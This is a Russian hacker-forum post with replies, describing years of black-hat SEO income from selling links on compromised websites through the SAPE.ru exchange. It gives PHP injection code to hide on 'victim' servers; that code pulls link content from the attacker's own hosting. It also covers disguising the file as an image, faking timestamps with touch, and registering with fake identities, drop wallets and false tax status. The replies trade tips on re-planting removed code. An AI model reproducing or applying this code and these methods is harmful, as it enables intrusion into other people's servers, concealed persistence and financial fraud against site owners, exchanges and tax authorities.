Здравствуй родной античат. Здравствуйте читатели... Это моя первая статья, первый опыт в написании статьи, первое то, к чему отнесся очень серьезно на форуме. (Узнал об интернет заработке от людей в своем городе по месту жительства, в которые конечно же, как и вы в самом начале не верили) Расскажу Вам, свой 2х или 3х летний опыт BLACKSEO работы с биржей ссылок SAPE.ru! =========== Предыстория... =========== Помню было лето 2009 года на дворе, больше ничего с того времени не помню на данный момент, так как много всего произошло с него, что я уже многое подзабыл. Так вот этим 2009 летом начался мой путь ниндзя в середине июля, тогда я был совсем нубом, ничего не знал и только вливался в сливки общества, так мне казалось, но я еще не знал, про то или даже сказать лучше тех, кто являлся настоящими сливками общества. Меня это очень заинтересовало, поэтому я сказал себе внутренним голосом, "Хули, я хуже чтоли?", поставив перед собой цель, добиться чтоб попасть в эти сливки, либо оставаться мудаком дальше. =========== Итак, с этих слов все и поперло... =========== Две недели вкуривания форума SAPE (forum.sape.ru), 2-3 аккаунта на этом форуме за все время, немного сообщений на форуме по вопросам связанным с правильной установкой кода вызова ссылок на площадках подключаемых в систему, троллинг (не с моей стороны), посыл нагугл... В связи с чем решил забить на их форум большой и огромный гвоздь, так как ответы там дают только за правильно заданный вопрос. Спрашивается: А как новичку сформулировать правильный вопрос, только пришедшему на форум СЕО продвижения по средствам купли-продажи ссылок, не разу этим не занимавшись в жизни, но очень хотел бы этим заниматься. Не правильно они там живут. На сколько помню такие личности, как Барыкины, братья или однофамильянды, те еще тролли (на днях видел Барыкина, который "Жук" какой то, на сапофоруме в сраче форуме), не был удивлен этому фактору, так как форум срача открыт для всех, поэтому не составит ему труда там регнуться и производить свои телодвижения и мыслеизвержения троллингом. К концу октября 2009 года, я смог уже вывести первую сумму заработанную на бирже ссылок SAPE.ru, о которой непосредственно и идет речь в данной статье. Составляло она не превышающую в эквиваленте 200$. После вывода данной суммы в наличность, для меня это было такое чувство, будто я король. После этого первого самого вывода, такого чувства больше не было, даже выводя более огромные суммы. =========== Начало 2010 год. Эйфория... =========== В этот период проходила эйфория... Я начал пихать ворованные сайты в биржу ссылок SAPE.ru, даже не думая о своей безопасности, не думая не о чем, ведь заработок был, а там я думал, если кто то заглянет "на чай" договоримся номиналом на месте, но я почему сейчас так не хочу, ибо лишнее палево не к чему. Потому что, узнав об этом один раз, второй раз уже точно не отмажешься, да и будут ложными проверками тебя угнетать либо еще что то, чтоб свой профит с костерить, пока ты там мутишь, а они за счет своего положения могут тобой манипулировать угрожая заключением, либо какими то плохими местами лишения свободы (СИЗО, КПЗ). =========== Начало-середина лета 2010 год. Мысли... =========== Расскажу немного про мысли... С моей точки зрения, если у тебя есть мысли, если ты постоянно что то анализируешь, то ты движешься вперед, с нужными мыслями по достижению своих целей, по достижению хорошей жизни, по той, в которой ты будешь чувствовать себя комфортно, в которой ты не будешь думать, "Блять, нет даже денег на новые кроссовки". С этого момента начала лета, мной было обдумано с точки зрения "Паранойи" личная безопасность. Я искал VPN сервис, которым пользовался по сей день, но в данный момент я не занимаюсь ничем, следовательно он мне не требуется. Сервис хороший, мне очень нравился, вот он (vpn.insorg.org), нареканий не имею, не разу ничего не предъявляли, не разу ни в чем не отказывали. Вот вроде бы и все, безопасность есть, площадки есть, руки есть, мозги и здравый смысл. Не пора бы мне подзаработать нормальный кэшик? - думал я про себя. Началось мое лето отлично, я работал до начала августа, без проблем заработав на отдых. Съездив на отдых, 7 дней, на 6 день меня стало ломать, что мой доход там без меня, как поживает, приеду, а все к ебеням уже закрыто. Но по приезду был удивлен, все на месте, даже доход вырос. =========== Конец 2010 года. Утвердился =========== В этот период, я уже имел, достаточно репутации на ачате, довольно стабильный заработок, работал по той же схеме, которую сам разработал, позже я о ней расскажу, очень простая, но до сих пор действенная. Не знаю почему, но на ней еще можно заработать не плохо, имея при этом шеллы! *Шелл - в переводе с английского "оболочка". При помощи щелла (скрипт на пхп или перле) можно без проблем выполнять команды юникса, по копированию, удалению, архивированию, разархивированию, редактированию, внесения изменений файлов и папок сайта внутри сервера через ссылку на шелл в браузере. Все просто, если понимать это. Все очень гениальное, очень простое. К концу года, меня ебануло по полной!!!!!!!! Я стал очень выебистым, да и при деньгах. Полностью пославший всех друзей, думающий на тот момент, что всем нужны только мои деньги. Даже "Пошли погуляем" с их стороны воспринимались мною, как повод побухать на кровные мои. Честно? Я даже не капли не жалею, что я так поступил на тот момент, потому что смотрю на них сейчас и вспоминаю тогда, мало что изменилось с тех пор, моя личность не любит стоять на месте в плане саморазвития, нужно постоянно развиваться, читать, поддерживать дебаты, вступать в перепалки, спорить с администрацией. Да да, вы скажите я превратился в интернетовского задрота, мне так говорили уже, но я при помощи своего задродства могу обеспечить себе то, что они не могут обеспечить годами. Так лучше быть задротом или рабом? Я думаю вы сделали свой выбор... =========== Начало 2011. Первая достигнутая цель, масштабная на тот момент. =========== Это блять машина! Отдал за нее 7500$ это тогда было так то много, но оно того стоило. Был пиздец как рад, не работающий пиздюк, на тот момент уже смог приобрести себе машину, многие интересовались конечно же, "Как так?", "Где работаешь?", на что поступали мутные ответы, типа "Взял кредит", "Помогаю родителям" и тому подобные. Не наврав, сухим из воды выйти было практически невозможно, так как в моем маленьком городе (~65к чел) живших в нем, про заработок в интернете многие были осведомлены, но к сожалению пытавшиеся чего то достичь, увенчались все попытки провалом. Горебеда, повезет в другой раз! А я все продолжаю работать по старой схеме. Сливая все бабло, которое зарабатываю до копейки в небытие... Дебил же. Ну а с другой стороны, те у кого их никогда не было, а вдруг они сразу появляются, да и еще в больших количествах, вы бы не повелись на эту уловку по слитию их в полном объеме на свои нужды? Думаю, что вы так и сделали бы, как сделал это я на тот момент. =========== 11 февраля 2011 года. Печалька =========== 5 февраля купил машину, 11 разьебал. Неудачник... Сделал за 2 недели что ли. Все норм Потом еще раз в будущем разъебал ее же. Неудачник...^2 Пришел я к выводу, что безразличие к вещам, отношение к ним то же играет огромную роль, поняв это, до сих пор разгребаю свои косяки 2011 года (По штрафам, по делам коряво сделанным... не много осталось) =========== 2011 год, сентябрь. Школота детектед =========== На этот момент я уже мог позволить себе проплату полную учебы, составляющую из ~7000$ за все время обучения + питание + распечатки + проезды! Мне на тот момент, казалась эта сумма такой мизерной, да в принципе и сейчас это плинтус моих возможностей, плинтусом должна быть и Ваших возможностей. Стремитесь к этому!!! На данный момент с сентября 2011 года, я уже завершаю учебу на гаишника, по совместительству с томожним делом. В общем могу быть как гаишником, так и таможенником. Одни из самых рыбных профессий! Инвестировать в себя, никогда не забывайте. Интернет заработок не вечен... (так мне говорила моя мама всегда, мол чтоб я не выебывался). =========== 2012 год. Все по прежнему, но... =========== В этот год работая дальше по старой схеме, в один из дней, схема наебнулась. Стало трудно пропихнуть площадки в систему SAPE.ru. Начал курить форумы, сразу же наткнулся на статью, пранкера Nightmare с ачата, нынешним числом саморипнутым с форума 21.12.2012 года в день "Конца света" Так запоминающийся. Вычитал что то подобного характера: "Сапа ужесточила правила по приему в систему новых площадок" Делалось это в связи с тем, чтоб выселить с системы черных, реально черных ВМ (вебмастеров), кем я и приходился на тот момент. У них, саповцев, это отлично получалось. Но были у меня козырьки, о которых в данной статье рассказывать не хотелось бы. Но при хорошем подходе и со здравым умом, в любой теме у тебя будут козыри. На данный момент их система "антиблэквм" до сих пор работает, так что пропинуть трудновато, но дам совет, не зацикливайтесь на SAPE.ru, ведь есть и другие аналоги, не такие мощные, ну а куда деваться... Двигайтесь дальше, не стойте на месте убиваясь тем, что все пропало, больше ничего не вернуть. Да не вернуть но что то приобрести новое. Как я и говорил под конец 2011 года, я был запилен на BSS. Там то моя деятельность продолжилась, совсем в ином направлении механической работы, но в сфере BLACKSEO! Курс отбил, все хорошо, нареканий нет. =========== 2013 год. Ищу новые схемы и темы... =========== Как я и говорил ранее, что у любой темы и схемы по заработку, имеются окончательный период... Поэтому не стоит стоять на месте, постоянно развивайтесь, чтоб после загинания одной темы, вы сами не встали в позу для заработка... =========== Регистрация в ПП (партнерской программе) =========== Тут все просто. По шагам напишу статью, по которой я подключал, код биржи ссылок SAPE.ru на вломанные площадки: 1. Регистрируемся в системе, как ВМ (вебмастер). Обязательно ставим галочку, что вы не резидент РФ, чтоб не отдавать системе 60 с чем то % от всего заработанного дохода. Там все официально у них если вы зарегистрируетесь как резидент. Пенсионные отчисление, налоги и тд. Если пропалят, что вы резидент, а регнулись, как не ризидент, забанят. Я всегда регался на все свои аккаунты 30-50 штук примерно, как "НЕ РЕЗИДЕНТ", банили на стук со стороны О (оптимизаторов), либо А (админов площадок). 2.Следующий шаг. Кем мы являемся? Мы являемся физическим лицом. Не разу не регался, как не физическое лицо. По моим сведениям, там нужно полный пакет документов высылать им, для подтверждения того или иного. Нам это не нужно. 3. Вот этот пункт резиденции или нет РФ. Ставим не резидент. Ранее писалось об этом. 4. Вводим липовые данные, можно даже Иванов Иван Иванович. (Кошелек тоже обязательно на дропа желательно). Объясняю: Если сапе попросят выдать данные ваши, то они незамедлительно это сделают, по просьбе спецслужб или админу сайта, настоящему админу, который потом захочет с вами расправиться, по заслугам, которым вы ему причинили, внедрившись к нему на сервак. Вводим свои липовые данные и жмем далее, форум ачате блочит много картинок в посте. Раньше такого не было, на сколько помню... Жмем далее. 5. Вводим тут свои личные данные для входа: Логин, пароль и почту. 6. Они попросят согласиться с правилами договора, который предоставляют, каждому участнику вступающим в систему, как ВМ. Проставляем галочки, тем самым соглашаемся с их условиями и жмем далее. 7. Ура, регистрация пройдена. Только нужно подтвердить учетную запись (активировать ее для работоспособности0, пройдя по ссылке отправленной роботом SAPE.ru на вашу почту. Регистрируем липовый ВМ счет (WEBMONEY) =========== Схема работы в SAPE.ru по которой работал все время... =========== 1. Первым делом заходим в аккаунт, жмем на кнопку добавить площадку. 2. Качаем от туда архив с вашим идентификатором, который по их рекомендациях нужно пихать в корень сайта, с их этим длинным хэшем. Но зачем? Тут поподробнее: Итак... Берем код вызова ссылок, который они предлагают для размещения на своем потенциальном сайте (в данном случае шелле). Я дам вам свой. Я его всегда запечатывал в папках например admin/images/ в файлике типа start.gif и инклудил в шаблон, с содержимым ниже: PHP: <?php /* * Это код для вставки в сайты - жертвы. В нем ОБЯЗАТЕЛЬНО надо указать путь до файла "жертва.php" */ $host = $_SERVER["HTTP_HOST"]; $url = $_SERVER["REQUEST_URI"]; ob_start(); function COMMON_GetPageContentViaGET($sUrl){ $aContent = file($sUrl); return( implode( '', $aContent ) ); } $content = COMMON_GetPageContentViaGET('http://ВАШ ХОСТИНГ/index.php?host='.$host.'&uri='.urlencode($url)); ob_end_clean(); echo $content; ?> Это путь до этого файлика. На свой хостинг его устанавливаем, потому что на сервере жертвы будет только код выше, все остальные файлы будут на нашем хостинге (код вызова ссылок + links.db) PHP: <div style=display:none><?php /* * Не забудь раскомментировать кодировку нужную. * Не забудь указать правильно $SapeAccount */ $SapeAccount = 'ТУТ ВАШ ИДЕНТИФИКАТОР АККАУНТА САПЕ'; define( '_SAPE_USER', $SapeAccount ); require_once($_SERVER['DOCUMENT_ROOT'].'/ПУТЬ ДО ФАЙЛИКА SAPE.PHP'); //$o['force_show_code'] = true; $o['multi_site'] = true; $o['host'] = $_GET['host']; $o['request_uri'] = urldecode($_GET['uri']); //$o['force_show_code'] = true; $o['charset'] = 'windows-1251'; $sape = new SAPE_client($o); $sapelink = $sape->return_links(); if (strlen($sapelink)=="17") { echo $sapelink."<center> echo </center> "; } else { echo $sapelink; } ?></div> Ссылки можете не скрывать, тогда админы площадок будут удалять его, затирая шелл (т.е доступ на сервер жертвы). После этих всех дейсвий, ставим везде тачи. Это команда юникса, которая позволяет предать нужную дату файлу или папке на сервере. Все что будет добавляться в сапе под данным методом, будет максимально спрятано от админа сайта. Не знаю, тянет ли эта статья на статью, но на этой схеме я заработал не одну сотню киллобаксов. Подготовлено Lasteeck, спициально для Античата Успехов всем.
Эта тема умерла еще в том 2009 когда ты все и начинал) Помните каков был спрос на шеллы с высоким ТИЦ?) На данный момент эта лавочка давнооо прикрыта, идут абузы куда только можно. Даже с твоим хитрым методом проксификации)
омг, ластик. зачем такой гемор кодом??? )) видел я такие коды на шеллах , теперь буду знать чьи они)) а инасчет того что тема умерла - бред, ничего она не умерла, как получал доход так и получаю, никаких обуз. ток код прячу иначе) один минус, ссылки нельзя скрывать иначе биржа забанит, приходится оставлять открытыми, слава бога админы лохи, не всегда замечают, даже если заметили и убрали то я ставлю код обратно)) а так в принципи, если приходится вступать в битву с адиинами то есть у меня в припасе еще одна тема которая намного лучше)) а так ты прав, не нужно стоять наместе, а придумывать новые и лучшие схемы)
по моим наблюдением sape становится все мене привлекательной, сейчас деньги зарабатывают на trustlink
Есть биржи более прибыльные нежли траст и сапа, но и траст лучше не упоминать, чтобы такие олени как ТС не лезли туда со своим говнокодом. Как у него после такого алгоритма подгрузки ссылок сайты работали это хороший вопрос. А сапа загнулась именно из за наплыва школоты которая вешала код абы как, после того как оптимизаторы раскупали ссылок, они их лишались и ебли мозги техподдержке которая и приняла меры.
Тема не умерла, только идиот может так думать. С правильным подходом, еще можно мутить хорошие деньги.
Да темы вообще не умирают, только изменяются, нет такой темы, которая умерла, даже дайлеры, хоть и в другом виде, получили вторую жизнь с развитием мобильных ОС. Просто тема стала не такой попсовой, из-за чего ТиЦевый шелл стало сложнее загнать.
Ситуация с сапой мне напоминает МММ с Лёней Голубковым, может кто-то и сможет там не много заработать, но думаю там лучше долго не задерживаться
Громадная просьба ко всем, не палите профитные биржи, не сливайте их названия в паблик если знаете, иначе убъёте тему.
Хочу попробовать создать свою биржу ссылок, где скрипты бесплатно взять подскажите? Обещаю за это что никакой модераций не будет Так же приглашаю компаньонов, желающих принять участие в проекте. Стучите в асю.
Их всего штук 10 бирж ссылок, из них 4 максимум заслуживают к себе уважения. А пендосовские не работают с вебманями! Так что найти эти все биржи не составит труда. Кстати новая биржа появилась ingots.ru, совсем еще зародыш. Мало участников, мало сайтов в системе, не сложная установка кода, модерацию проходят все сайты, которые пробовал пропихнукть, выплачивают даже если банят, площадки только банят, а не аккаунты. Попробуйте возможно вам понравится биржа ссылок Инкотс.ру
Добавляю сайт, выдает Ошибка! Золотой сайт должен иметь не менее 100 входящих ссылок! что это значит растолкуй
Честно? Не знаю, но думаю, что в индексе мало страниц у сайта, поэтому алгоритм сканирования палит и выдает ошибку. Я читал у них есть такой алгоритм, который сканирует на автомодерации сайт на соотношение количества исходящих и входящих ссылок сайта. У меня такой ошибки не выдавало не разу.
скромненько. по сути паблик. если ты действительно что то поднял с этого молоток. за старания в написании материала + а так это даже не SEO как таковое
А какие я ставил схемы в настройках это SEO))))) Я всегда юзал схему 5-3-3 в настройках каждой площадки, чистил на каждом купленном шелле ВС (внешние ссылки), обрамливал их в теги <noindex></noindex>, чтоб их было в лучшем случае 0 или максимум 2. Если были такие, что не смог найти ВС, сайт не добавлялся в систему, потому что все равно, с него очень трудно бы скупали места. А эти схемы 0-1-1, в жизни не использовал, и на 5-3-3 все нормально было. Один кон (ап) площадка одна выросла резко с 80 до 700 ТИЦ! Она мне дейли сразу стала через время приносить 10$. Так же в настройках стоят галочки на: 1. Автоматический режим 2. Скрывать ссылку от оптимизаторов (URL) 3. Adult-тематики резать 4. Ненормативную лексику тоже резать Никого не навязываю в этой статье не на какие действия, я показал свой способ, сейчас я не работаю по этой теме, ушел в другую нишу. Но если когда то не дай бог прижмет, я вернусь в биржи.
чем ты занимаешься сейчас, какие существуют еще высокодоходные проекты? Поделись, в паблик нельзя, напиши в личку, буду благодарен самому искать отнимает много времени, хотелось бы подключится сразу к бизнесу
а вот тут уже что то есть действительно. если планируешь дальнейшее написание статей по SEO, то вот такие схемки приводи в пример, в данном случае это важно. больше опыта +